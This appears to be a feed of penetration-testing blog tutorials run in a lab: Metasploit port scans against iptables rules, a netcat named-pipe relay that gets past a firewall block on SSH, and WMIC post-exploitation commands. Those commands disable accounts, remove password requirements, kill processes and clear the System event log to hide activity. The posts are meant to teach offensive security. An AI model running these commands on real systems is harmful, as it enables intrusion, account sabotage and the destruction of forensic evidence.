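    for name, cfg in (("weak", WEAK_CONFIG), ("misleading", MISLEADING_CONFIG),
                      ("hardened", HARDENED_CONFIG)):
        print(name, audit_sshd_config(cfg) or "OK")
```

On a live host, `sshd -T` prints the effective configuration and is the authoritative cross-check for what this parser reports.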

Author: Nisha Sharma is trained in Certified Ethical Hacking and is a bug bounty hunter.


Port Scanning using Metasploit with IPTables


Port scanning is a technique penetration testers use to identify the state of network services associated with particular port numbers. For example, port 80 is used for the HTTP service and port 22 for the SSH service. We suggest using Nmap for enumerating port state; for best practice, read our detailed article on how Nmap works.

Moreover, Metasploit also offers port scanning for enumerating network services, and makes it easier compared to Nmap.

Let’s start!!

Requirement

Attacker:  Kali Linux (192.168.1.103)

Target: Ubuntu (192.168.1.105)

Open a terminal on the target and add the iptables rules given below for incoming traffic; they drop TCP ACK packets to port 80 and SYN packets to port 22 respectively.

sudo iptables -I INPUT -p tcp --tcp-flags ALL ACK --dport 80 -j DROP
sudo iptables -I INPUT -p tcp --tcp-flags ALL SYN --dport 22 -j DROP

ACK Scan

Now open a terminal in your Kali Linux, type msfconsole to load the Metasploit framework, and execute the auxiliary commands below to run the module.

This module maps out firewall rulesets with a raw ACK scan. Any unfiltered ports found mean a stateful firewall is not in place for them.

As specified in the command below, the module sends an ACK packet to ports 21, 22, 80 and 443 to enumerate the state of the firewall for those ports. If it receives a RST packet in reply from a destination port, it reports that port as unfiltered; if no RST comes back, it prints nothing for that port, which means the port is protected by the firewall.

use auxiliary/scanner/portscan/ack
msf auxiliary(ack) > set rhosts 192.168.1.105
msf auxiliary(ack) > set ports 21,22,80,443
msf auxiliary(ack) >exploit

From the image below you can observe that it shows TCP unfiltered for ports 21, 22 and 443 and nothing for port 80, hence port 80 is filtered. This scan can only be used to identify the state of the firewall, i.e. whether a port is filtered or unfiltered.

We used Wireshark to demonstrate the ACK scan; here you can observe that port 80 does not reply with a RST packet, which means the ACK packet to port 80 was blocked by the network administrator's rule.

SYN Scan

This module enumerates open TCP services using a raw SYN scan. Here a SYN packet is sent to ports 21, 22, 80 and 443 to determine whether each is open or closed. If a SYN/ACK packet comes back from a destination port, the module reports that port as OPEN; if no SYN/ACK comes back, it prints nothing for that port, which indicates a filtered or closed state.

use auxiliary/scanner/portscan/syn
msf auxiliary(syn) > set rhosts 192.168.1.105
msf auxiliary(syn) > set ports 21,22,80,443
msf auxiliary(syn) >exploit

From the image below you can observe that it shows TCP OPEN for ports 21, 80 and 443 and nothing for port 22, hence port 22 is filtered or closed.

Again we used Wireshark to demonstrate the SYN scan; here you can observe that port 22 does not reply with a SYN/ACK packet, which means the SYN packet to port 22 was blocked by the network administrator's rule.

Moreover, you can observe the following packet exchange between the source and destination ports:

  • Source port sends SYN packet to the destination port
  • Source port receives SYN, ACK packet from the destination port
  • Source port sends RST packet to the destination port

TCP Scan

This module enumerates open TCP services by performing a full TCP connect on each port. It does not need administrative privileges on the source machine, which may be useful when pivoting.

use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set rhosts 192.168.1.105
msf auxiliary(tcp) > set ports 21,22,80,443
msf auxiliary(tcp) >exploit

This scan is similar to the SYN scan; the only difference is that it completes the full TCP exchange (the handshake followed by the teardown, four packets as listed below), whereas the SYN scan stops halfway through the handshake.

From the image below you can observe that it shows TCP OPEN for ports 21, 80 and 443 and nothing for port 22, hence port 22 is filtered or closed.

Here you can observe that port 22 does not reply with a SYN/ACK packet, which means the SYN packet to port 22 was blocked by the network administrator's rule.

Moreover, you can observe the following packet exchange between the source and destination ports:

Moreover, you can observe the following packet communication between the source and destination port.

  • Source port sends SYN packet to the destination port
  • Source port receives SYN, ACK packet from the destination port
  • Source port sends ACK packet to the destination port
  • Source port sends FIN, ACK packet to the destination port

XMAS Scan

Enumerate open|filtered TCP services using a raw “Xmas” scan; this sends probes containing the FIN, PSH, and URG flags.

Instead of the TCP 3-way handshake, this scan uses other TCP flags to determine the state of each port.

use auxiliary/scanner/portscan/xmas
msf auxiliary(xmas) > set rhosts 192.168.1.105
msf auxiliary(xmas) > set ports 21,22,80,443
msf auxiliary(xmas) > exploit

In the image below you can see that this time the module reports TCP OPEN|FILTERED for all four ports, i.e. 21, 22, 80 and 443.

In the image below the source port sends packets with the FIN, PSH and URG flags set, and the destination ports send no reply at all; that silence is what marks the ports above as open|filtered. Had a destination port answered with an RST, ACK packet, that port would have been reported as closed.
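To tie the three scans together, here is an added example (not code from the article) that reads constructed packet records like the ones in the Wireshark screenshots and applies the reply rules described above, both to name the scan from the scanner's own packets and to derive each port's state. The scanner address 192.168.1.2 and source port 40000 are assumptions.

```python
"""Infer scan type and per-port state from the packet exchanges shown above.
Added example, not code from the Hacking Articles post. The captures are
constructed to mirror the article's observations for 192.168.1.105 on ports
21,22,80,443; the scanner 192.168.1.2 and source port 40000 are assumptions.
Flags: S=SYN A=ACK R=RST F=FIN P=PSH U=URG."""
from collections import defaultdict

SCANNER, TARGET, SPORT = "192.168.1.2", "192.168.1.105", 40000

def probe(port, flags):  # scanner -> target
    return (SCANNER, SPORT, TARGET, port, flags)

def reply(port, flags):  # target -> scanner
    return (TARGET, port, SCANNER, SPORT, flags)

# Port 22 never answers in any capture: the firewall drops the probe.
SYN_SCAN = [probe(22, "S")] + [p for port in (21, 80, 443) for p in
            (probe(port, "S"), reply(port, "SA"), probe(port, "R"))]
TCP_SCAN = [probe(22, "S")] + [p for port in (21, 80, 443) for p in
            (probe(port, "S"), reply(port, "SA"), probe(port, "A"), probe(port, "FA"))]
XMAS_SCAN = [probe(port, "FPU") for port in (21, 22, 80, 443)]

def classify_scan(capture):
    """Name the scan from the scanner's own packets (the three exchanges above)."""
    sent = {flags for src, _, _, _, flags in capture if src == SCANNER}
    if "FPU" in sent:
        return "xmas"
    if {"A", "FA"} <= sent:
        return "tcp"  # full connection: handshake completed, then FIN/ACK
    if "R" in sent:
        return "syn"  # half-open: RST instead of finishing the handshake
    raise ValueError("no recognisable scan probes")

def port_states(capture, probed_ports):
    """Article's reply rules: SYN/ACK -> open, RST/ACK -> closed, silence ->
    filtered (or open|filtered for an Xmas probe, which open ports ignore)."""
    scan = classify_scan(capture)
    replies = defaultdict(set)
    for src, sport, _, _, flags in capture:
        if src == TARGET:  # the scanned port is the target's source port
            replies[sport].add(flags)
    states = {}
    for port in probed_ports:
        got = replies[port]
        if scan == "xmas":
            states[port] = "closed" if "RA" in got else "open|filtered"
        else:
            states[port] = ("open" if "SA" in got else
                            "closed" if "RA" in got else "filtered")
    return states
```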

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a social media and gadgets lover. Contact here

The post Port Scanning using Metasploit with IPTables appeared first on Hacking Articles.

Bypass SSH Restriction by Port Relay


Today we are going to access an SSH port that is blocked by the firewall by forwarding it to another port with a port relay tool. A Netcat relay is a handy way to connect to a remote system while evading such a firewall restriction.

Attacker: Kali Linux (IP: 192.168.1.2)

Victim: Ubuntu Server (IP: 192.168.1.7)

Connect to SSH via port 22

Let's first try to get a normal SSH shell. As you can see in the screenshot, we successfully got an SSH shell on port 22 of the server 192.168.1.7.

ssh pavan@192.168.1.7

Block Port 22 for Incoming TCP Packet

Now let's block the SSH service port 22 for incoming TCP packets using iptables. Here we add an inbound rule that drops TCP packets to port 22 when the packet source is Kali (192.168.1.2).

iptables -A INPUT -s 192.168.1.2 -p tcp --dport 22 -j DROP

After blocking the port, let's try to get a shell again. In the image below you can see that we get a Connection Timed Out error because the packets are dropped by the firewall.

Allow TCP Packets on another port

Now let’s make a rule in the firewall to accept the TCP packets on the port 4444 if the packet source is Kali (192.168.1.2).

iptables -I INPUT 1 -s 192.168.1.2 -p tcp --dport 4444 -j ACCEPT

Check Netcat communication between Attacker and Client

Let's check whether Kali (192.168.1.2) can reach a netcat listener on port 4444 of the server. Start the listener on the server, then connect to it from Kali.

nc -v -l -p 4444

nc 192.168.1.7 4444

As you can see in the image, we got a netcat session on port 4444 between Kali (192.168.1.2) and the SSH server.

Use Netcat Relay backpipe to access SSH service

Now we have to build the relay. But first, let's understand what the commands shown below do.

The first command creates a special type of file called a FIFO, or named pipe. We call it backpipe because it will carry our responses back through the relay.

The second command starts a netcat listener on the port that the firewall allows. This listener takes its standard input (0<) from the backpipe. Its standard output is piped to a netcat client that connects to our localhost (127.0.0.1) on TCP port 22, where sshd listens, and that client's standard output (1>) is written back into the backpipe. Data therefore flows forward through the pipe and responses flow back through the FIFO at the same time; we need both the forward pipe and the back pipe because netcat communication is two-way.

mknod /tmp/backpipe p

Here,

[p]: Tells the mknod to create a FIFO

nc -l -p 4444 0</tmp/backpipe | nc localhost 22 1>/tmp/backpipe

Here,

[-l]: Listener

[-p]: Port

Access SSH through Netcat Relay

Now let's try to make the SSH connection through port 4444.

ssh pavan@192.168.1.7 -p 4444

Here,

[-p]: To specify Port
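The same two-way forwarding written as a small Python program, as an added example that is not part of the original post; it makes clear why the netcat version needs the back pipe. relay_once() defaults to the article's target, sshd on 127.0.0.1:22, while demo() relays to a local echo server on free loopback ports instead (an assumption, so it runs without sshd or iptables).

```python
"""Two-way TCP relay in one process: the job the mknod + nc pair above does.
Added example, not code from the Hacking Articles post. relay_once() defaults
to the article's target, sshd on 127.0.0.1:22; demo() instead relays to a local
echo server on free loopback ports (an assumption so it runs without sshd)."""
import selectors
import socket
import threading

def relay_pair(client, upstream):
    """Copy bytes both ways until either side closes. nc needs the FIFO for
    exactly this: stdout carries one direction, the backpipe the replies."""
    sel = selectors.DefaultSelector()
    peer = {client: upstream, upstream: client}
    for sock in peer:
        sel.register(sock, selectors.EVENT_READ)
    moved = 0
    try:
        while True:
            for key, _ in sel.select():
                data = key.fileobj.recv(4096)
                if not data:  # one side hung up: tear down both
                    return moved
                peer[key.fileobj].sendall(data)
                moved += len(data)
    finally:
        client.close()
        upstream.close()

def relay_once(srv, target=("127.0.0.1", 22)):
    """Accept one client on listening socket srv, relay it to target; returns bytes moved."""
    client, _ = srv.accept()
    srv.close()
    return relay_pair(client, socket.create_connection(target))

def echo_once(srv):
    """Stand-in for sshd: echo one connection back until it closes."""
    conn, _ = srv.accept()
    with srv, conn:
        for data in iter(lambda: conn.recv(4096), b""):
            conn.sendall(data)

def demo(message=b"SSH-2.0-demo\r\n"):
    """Stand-in for 'ssh -p 4444': reach the echo server only via the relay."""
    echo = socket.create_server(("127.0.0.1", 0))   # in the article: sshd on :22
    srv = socket.create_server(("127.0.0.1", 0))    # in the article: nc -l -p 4444
    threading.Thread(target=echo_once, args=(echo,), daemon=True).start()
    threading.Thread(target=relay_once, args=(srv, echo.getsockname()), daemon=True).start()
    with socket.create_connection(srv.getsockname()) as c:
        c.sendall(message)
        return c.recv(4096)
```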

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

The post Bypass SSH Restriction by Port Relay appeared first on Hacking Articles.

Post Exploitation Using WMIC (System Command)


This article is about post exploitation using WMIC (the Windows Management Instrumentation Command Line). Once an attacker has a meterpreter session on a remote PC, he or she can enumerate a huge amount of information and make effective changes using the WMI command line.

To do this, we will first get the meterpreter session on the Remote PC which you can learn from here. After gaining the session, escalate its privilege to Administrator which you can learn from here.

The WMIC command line is accessed through the Windows cmd. To get there, type "shell" in the meterpreter session.

Now let’s look at the wmic commands and their working

WMIC

This command shows the global options used with the wmic command. WMIC global options set properties of the WMIC environment; combining global options with aliases lets us manage the system from the wmic environment.

wmic /?

Get System Roles, User Name, and Manufacturer

We can enumerate lots of information about the victim system, including its name, domain, manufacturer, model number and much more, through the computersystem alias of wmic.

We are adding the following filters to get a specific result.

Roles: gives all the roles the victim system plays, such as Workstation, Server, Browser etc.

Manufacturer: gives the manufacturer of the system; sometimes a particular model from a particular manufacturer has known vulnerabilities, so we can use this information to search for any that apply directly.

UserName: gives the logged-on username, which is very helpful because it lets us differentiate between administrators and normal users.

[/format:list]: formats the output as a list.

wmic computersystem get Name, domain, Manufacturer, Model, Username, Roles /format:list

Get the SIDs

To enumerate the SIDs of the groups on the system we use the group alias of wmic.

wmic group get Caption, InstallDate, LocalAccount, Domain, SID, Status

As shown in the image below, we found each group's account name, domain, whether it is a local account, its SID and its status.

Create a process

We can create processes on the victim's system using the process alias of wmic.

This is helpful for running a backdoor or for filling up the memory of the victim's system.

Syntax: wmic process call create "[Process Name]"

wmic process call create "taskmgr.exe"

As you can see in the screenshot below, this command not only creates a process but also returns its process ID, so that we can manipulate that process as needed.

Note: if the process creates a window, like Task Manager or cmd, this command will open that window on the victim's system and arouse the victim's suspicion.

Change Priority of a Process

We can change the priority of any process running on the victim's system with the process alias of wmic.

This is an important feature because it lets us manipulate processes: we can raise or lower the priority of any process we choose. Lowering a process's priority can crash that application, and raising it may crash the whole system.

wmic process where name="explorer.exe" call setpriority 64

Terminate a process

We can terminate a process running on the victim's system with the process alias of wmic.

wmic process where name="explorer.exe" call terminate

Get a list of Executable Files

We can get a list of the paths of executable files other than those under the Windows directory.

wmic PROCESS WHERE "NOT ExecutablePath LIKE '%Windows%'" GET ExecutablePath

Get Folder Properties

To extract the basic information about a folder on the victim’s system we can use fsdir alias of the wmic command line.

It can enumerate the following information about a folder:

Compressed, CompressionMethod, Creation Date, File Size, Readable, Writable, System File or not, Encrypted, Encryption Type and much more.

wmic FSDIR where "drive='c:' and filename='test'" get /format:list

Get File Properties

To extract the basic information about a file on the victim’s system we can use datafile alias of the wmic command line.

It can enumerate following information about a file:

Compressed, CompressionMethod, Creation Date, File Size, Readable, Writable, System File or not, Encrypted, Encryption Type and much more.

Syntax: wmic datafile where name='[Path of File]' get /format:list

wmic datafile where name='c:\\windows\\system32\\demo\\demo.txt' get /format:list

Locate System Files

Extract the paths of all the important system locations like the temp folder, the Windows directory and much more.

wmic environment get Description, VariableValue

In the image below you can read each variable value next to its description.

Get a list of Installed Applications

We can get a list of the applications or software installed on the victim's system.

wmic product get name

Get a list of Running Services

We can fetch the list of running services together with whether or not each starts automatically.

wmic service where (state="running") get caption, name, startmode, state

In the image below you can see the startmode as either "Auto" or "Manual" and the state "Running" for the listed services.

Get Startup Services

We can enumerate startup entries using the startup alias, which lists everything that runs during Windows startup.

wmic startup get Caption, Command

Get System Driver Details

We can enumerate driver details like name, path and service type using the sysdriver alias.

This command gives the path of the driver file, its state (Running or Stopped) and its type (Kernel or File System).

wmic sysdriver get Caption, Name, PathName, ServiceType, State, Status /format:list

Get OS Details

We can narrow down the victim's location from the time zone the system is set to, which we extract using the OS alias.

The same alias also gives the last boot-up time, the number of users and processes, the registered user and information about physical and virtual memory.

wmic os get CurrentTimeZone, FreePhysicalMemory, FreeVirtualMemory, LastBootUpTime, NumberOfProcesses, NumberOfUsers, Organization, RegisteredUser, Status /format:list

Get the Motherboard Details

We can use the baseboard alias of the wmic command line to enumerate the motherboard details of the victim’s system. Things we can enumerate are Motherboard Manufacturer, Serial Number, and Version

wmic baseboard get Manufacturer, Product, SerialNumber, Version

Get BIOS Serial Number

We can use the bios alias of the wmic command line to enumerate the bios details of the victim’s system.

wmic bios get SerialNumber

In the image below you can see the BIOS serial number we enumerated from the victim's system.

Get Hard Disk Details

We can enumerate information about the System Hard Disk using the diskdrive alias.

We get to know the Interface Type, Manufacturer, and Model Name, all through this command.

wmic diskdrive get Name, Manufacturer, Model, InterfaceType, MediaLoaded, MediaType /format:list

Get Hard Disk Partitions Details

We can get the information about the Hard Disk Partitions using the logicaldisk alias.

We get the name, compression status, File System (NTFS, FAT) and much more all using this command.

wmic logicaldisk where drivetype=3 get Name, Compressed, Description, FileSystem, FreeSpace, SupportsDiskQuotas, VolumeDirty, VolumeName

In the image below you can read the description of each disk along with its file system (NTFS), the available free space and many more details as required.

Get Memory Cache Details

We can get the information about the Memory Cache using Memcache alias. We can get the name, block size, purpose and much more all using this command.

wmic memcache get Name, BlockSize, Purpose, MaxCacheSize, Status

In the image below you can see that it shows the details of two cache memories.

Get Memory Chip Details

We can get the information about the RAM using the memorychip alias.

We get the Serial number of the RAM without removing the RAM or physically being near the system using this command.

wmic MEMORYCHIP get PartNumber, SerialNumber

Detect If victim system is a host OS or installed via VMware

We can find out whether the victim's system is running as a host operating system, i.e. installed directly on the hard drive, or virtually under VMware or VirtualBox.

wmic onboarddevice get Description, DeviceType, Enabled, Status /format:list

In the image below, note the highlighted text: it shows VMware in the description.

User Account Management

Lock a User Account

We can stop a local user from using their account with the useraccount alias; here we lock (disable) a user account.

wmic useraccount where name='demo' set disabled=true

In the image below you can see that we successfully locked the user account "demo".

Remove Password Requirement for Login

We can remove a local user's password requirement for login by using the useraccount alias.

wmic useraccount where name='demo' set PasswordRequired=false

Rename a user account

We can rename a local user by using the useraccount alias.

wmic useraccount where name='demo' rename hacker

Restrict user from changing a password

We can restrict a local user from changing their password by using the useraccount alias.

wmic useraccount where name='hacker' set passwordchangeable=false
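From the defender's side, the settings flipped by the four useraccount commands above are easy to audit from the same tool's /format:list output. The following is an added example, not code from the article: a parser for wmic /format:list output (it works for any alias, not just useraccount) applied to a constructed listing that assumes the commands above have already been run on the host.

```python
"""Parse 'wmic ... /format:list' output and flag accounts carrying the changes
made in the section above. Added example, not code from the Hacking Articles
post. SAMPLE is constructed to resemble the output of
  wmic useraccount get Name,Disabled,PasswordRequired,PasswordChangeable /format:list
on a host where the four useraccount commands above have already been run."""

SAMPLE = """\

Disabled=FALSE
Name=Administrator
PasswordChangeable=TRUE
PasswordRequired=TRUE


Disabled=TRUE
Name=hacker
PasswordChangeable=FALSE
PasswordRequired=FALSE

"""

def parse_wmic_list(text):
    """One dict per instance from blank-line separated key=value blocks (CRLF or LF)."""
    records, current = [], {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            if current:
                records.append(current)
                current = {}
            continue
        key, _, value = line.partition("=")
        current[key.strip()] = value.strip()
    if current:
        records.append(current)
    return records

def is_true(value):
    return value.strip().upper() == "TRUE"

def weakened_accounts(text):
    """Map account name -> findings for the settings the section above flips."""
    findings = {}
    for acct in parse_wmic_list(text):
        issues = []
        if not is_true(acct.get("PasswordRequired", "TRUE")):
            issues.append("password not required")        # set PasswordRequired=false
        if not is_true(acct.get("PasswordChangeable", "TRUE")):
            issues.append("password change blocked")      # set passwordchangeable=false
        if issues:
            findings[acct["Name"]] = issues
    return findings
```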

Get Antivirus Details

We can enumerate the antivirus installed on the victim’s system along with its location and version.

wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName, productState, pathToSignedProductExe

Clear System Logs

Wmic can also delete system logs using the nteventlog alias. It is a very simple command: we name the log file and call cleareventlog on it. It can be an effective command when cleaning up after hacking a system.

Syntax: wmic nteventlog where filename='[logfilename]' call cleareventlog

wmic nteventlog where filename='system' call cleareventlog

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

The post Post Exploitation Using WMIC (System Command) appeared first on Hacking Articles.
